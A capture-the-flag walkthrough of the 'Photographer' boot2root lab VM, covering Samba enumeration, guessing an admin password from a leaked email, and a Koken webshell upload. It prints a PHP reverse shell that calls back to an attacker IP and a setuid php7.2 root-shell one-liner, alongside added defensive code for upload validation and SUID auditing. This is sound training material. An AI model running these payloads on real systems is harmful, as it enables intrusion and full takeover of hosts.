Target VM download: click here
This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt.
0x00 Information gathering
Checking the VM shows its IP address is 192.168.237.132.
Scan the ports:
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18
MAC Address: 00:0C:29:C1:54:75 (VMware)
Service Info: Hosts: PHOTOGRAPHER, example.com
Wappalyzer identifies the CMS on ports 8000 and 80 as Koken. Its admin panel has a file upload vulnerability, but we cannot log in yet.
There is a suspicious shell.php:
There is an admin login page:
Enumerate with enum4linux. It finds shares:
[+] Attempting to map shares on 192.168.237.132
//192.168.237.132/print$        Mapping: DENIED, Listing: N/A
//192.168.237.132/sambashare    Mapping: OK, Listing: OK
//192.168.237.132/IPC$          [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
There are two usernames, daisa and agi:
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\daisa (Local User)
S-1-22-1-1001 Unix User\agi (Local User)
0x01 Getting access
Try anonymous access to the share. It works and yields mailsent.txt and a WordPress backup.
mailsent.txt:
Message-ID: <4129F3CA.2020509@dc.edu>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <agi@photographer.com>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <daisa@photographer.com>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)
The mail gives us the address daisa@photographer.com and the keywords Daisa, secret, babygirl and so on. After a few attempts, that address with the password babygirl logs into the admin panel on port 8000.
Import content → upload the webshell → intercept the request → change the file extension
Copy the link behind the front-end [Download File] button: the webshell has been uploaded successfully.
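The upload step above works because the extension the server finally accepts can be changed after the browser-side check has passed. The following is an added example of my own, not Koken's code, showing the server-side validation a gallery upload handler should perform instead: take the extension only from an allowlist, verify the file's magic bytes against that type, reject obvious embedded script markers, and choose the stored filename itself. The ALLOWED_TYPES table, the SCRIPT_MARKERS list and all function names are assumptions made for illustration.

```python
# Added example (not Koken's code): server-side upload validation that never
# trusts the client-supplied filename, path or Content-Type.
import os
import secrets

# Allowlist: final extension -> accepted leading magic bytes (assumed table).
ALLOWED_TYPES = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}

# Heuristic backstop only: markers that never belong in an image that will be
# served from a web root. The primary defence is the extension + magic check.
SCRIPT_MARKERS = (b"<?php", b"<script")


def _extension(client_filename):
    """Lower-cased final extension of the client's basename, or '' if none.
    Path components (including ../) are discarded before looking at the name."""
    base = os.path.basename(client_filename.replace("\\", "/"))
    if "." not in base:
        return ""
    return base.rsplit(".", 1)[1].lower()


def validate_upload(client_filename, data):
    """Return (ok, reason). ok is True only when every check passes.

    Checks, in order: final extension is allowlisted; file content starts with
    the magic bytes of that type (so shell.php.jpg containing PHP is rejected
    even though its final extension is jpg); no script marker inside the body.
    """
    ext = _extension(client_filename)
    if ext not in ALLOWED_TYPES:
        return False, "extension not in allowlist: %r" % ext
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not match %s magic bytes" % ext
    lowered = data.lower()
    if any(marker in lowered for marker in SCRIPT_MARKERS):
        return False, "embedded script marker found"
    return True, "ok"


def storage_name(client_filename):
    """Server-chosen name: random token plus the validated extension.
    The client's basename is dropped entirely, so it can never steer the
    path or the handler the web server picks for the file."""
    return "%s.%s" % (secrets.token_hex(16), _extension(client_filename))


if __name__ == "__main__":
    # Constructed inputs: a real-looking JPEG header and a PHP file renamed to .jpg
    print(validate_upload("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16))
    print(validate_upload("shell.php.jpg", b"<?php phpinfo(); ?>"))
    print(storage_name("../../photo.JPG"))
```

Even with this in place, the upload directory should be served without a PHP handler (or kept outside the web root and proxied through a download script), so that a file which slips past the content checks is still returned as bytes rather than executed.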
Got the contents of user.txt ^^
0x02 Privilege escalation
Burp is awkward to work with here, so I moved a reverse shell in instead. (If you ask: I clumsily deleted the shell built into the box.)
<?php
// Reverse shell: connect back to the attacker's listener and attach /bin/sh
// to the socket as stdin, stdout and stderr.
$ip = '192.168.237.131';   // attacker IP
$port = '9982';            // listener port
$sock = fsockopen($ip, $port);
$descriptorspec = array(
    0 => $sock,   // stdin
    1 => $sock,   // stdout
    2 => $sock    // stderr
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
?>
Find all SUID executables on the system:
find / -user root -perm -4000 -print 2>/dev/null
php7.2 is among them, and looking it up tells us:
We need it to run as root, so:
/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
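The SUID hunt above is also what a defender should be running on a schedule: a setuid interpreter such as php7.2 owned by root hands every local user a root shell, as the command above shows. The following is an added example, not part of the writeup, that walks a tree the way find -perm -4000 does and flags setuid files whose names look like interpreters. demo_audit() builds a constructed tree under a temporary directory so it runs without root; the SUID_INTERPRETER pattern and the function names are my own.

```python
# Added example (not from the writeup): audit a directory tree for setuid
# executables and flag the ones that are interpreters, since a setuid
# interpreter executes arbitrary code as the file's owner.
import os
import re
import shutil
import stat
import tempfile

# Assumed pattern: interpreter basenames with an optional version suffix,
# e.g. php7.2, python3.8, perl, bash, sh.
SUID_INTERPRETER = re.compile(r"^(php|python|perl|ruby|bash|sh|dash|node|lua)[0-9.]*$")


def find_suid(root, owner_uid=0):
    """Sorted paths of regular files under root with the setuid bit set and
    owned by owner_uid (None = any owner). Symlinks are not followed and
    unreadable entries are skipped, mirroring find's default behaviour."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not (st.st_mode & stat.S_ISUID):
                continue
            if owner_uid is not None and st.st_uid != owner_uid:
                continue
            hits.append(path)
    return sorted(hits)


def audit(root, owner_uid=0):
    """Return {'setuid': [...], 'interpreters': [...]} for the tree under root.
    'interpreters' is the subset a defender should strip the bit from
    (chmod u-s) unless there is a documented reason for it."""
    setuid = find_suid(root, owner_uid)
    flagged = [p for p in setuid if SUID_INTERPRETER.match(os.path.basename(p))]
    return {"setuid": setuid, "interpreters": flagged}


def demo_audit():
    """Build a constructed tree with one setuid interpreter, one setuid
    non-interpreter and one plain file, audit it with the current uid, and
    return the result with paths relative to the temporary root."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("php7.2", 0o4755), ("passwd", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "wb") as f:
            f.write(b"#!/bin/sh\nexit 0\n")
        # chmod after writing: a write by a non-root process clears setuid.
        os.chmod(path, mode)
    try:
        result = audit(root, owner_uid=os.getuid())
        return {k: [os.path.relpath(p, root) for p in v] for k, v in result.items()}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo_audit())
```

Against a real host, audit("/", owner_uid=0) reproduces the find command from the writeup; anything listed under 'interpreters' is the finding to fix (chmod u-s, or remove the binary if it is not needed), and the full 'setuid' list is worth diffing against a known-good baseline so that a newly added bit stands out.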
proof.txt is in /root: